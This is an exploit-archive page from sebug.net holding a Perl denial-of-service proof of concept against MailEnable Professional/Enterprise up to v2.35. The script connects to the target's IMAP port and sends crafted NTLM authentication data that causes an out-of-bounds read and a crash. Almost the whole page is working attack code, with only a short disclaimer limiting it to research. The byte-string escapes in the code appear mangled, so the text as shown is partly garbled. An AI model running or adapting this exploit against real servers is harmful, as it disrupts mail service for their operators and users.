MailEnable Professional/Enterprise <= 2.35 Out of Bounds DoS Exploit
SEBUG-ID:6241
SEBUG-Appdir:MailEnable
Published:2007-02-22
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
#!/usr/bin/perl
#
# maildisable-v5.pl
#
# Mail Enable Professional/Enterprise <=v2.35 (win32)
# by mu-b - Wed Nov 29 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
# Mail Enable Professional v2.33 (win32)
# Mail Enable Professional v2.34 (win32)
# Mail Enable Professional v2.35 (win32)
#
# out of bounds read == DoS
#
########
use Getopt::Std; getopts(\'t:\', \\%arg);
use Socket;
use MIME::Base64;
&print_header;
my $target;
if (defined($arg{\'t\'})) { $target = $arg{\'t\'} }
if (!(defined($target))) { &usage; }
my $imapd_port = 143;
my $send_delay = 2;
my $PAD = \'A\';
if (connect_host($target, $imapd_port)) {
print(\"-> * Connected
\");
send(SOCKET, \"1 AUTHENTICATE NTLM
\", 0);
sleep($send_delay);
$buf = ($PAD x 12).
\"xfaxffxffxff\".
($PAD x 12);
send(SOCKET, encode_base64($buf).\"
\", 0);
sleep($send_delay);
$buf = ($PAD x 28).
\"x00x01\".
($PAD x 2).
\"xefxbexadxde\";
send(SOCKET, encode_base64($buf).\"
\", 0);
sleep($send_delay);
print(\"-> * Successfully sent payload!
\");
}
sub print_header {
print(\"MailEnable Pro <=v2.36 DoS POC
\");
print(\"by:
\");
}
sub usage {
print(qq(Usage: $0 -t
-t : hostname to test
));
exit(1);
}
sub connect_host {
($target, $port) = @_;
$iaddr = inet_aton($target) || die(\"Error: $!
\");
$paddr = sockaddr_in($port, $iaddr) || die(\"Error: $!
\");
$proto = getprotobyname(\'tcp\') || die(\"Error: $!
\");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(\"Error: $!
\");
connect(SOCKET, $paddr) || die(\"Error: $!
\");
return(1338);
}
// sebug.net [2007-02-22]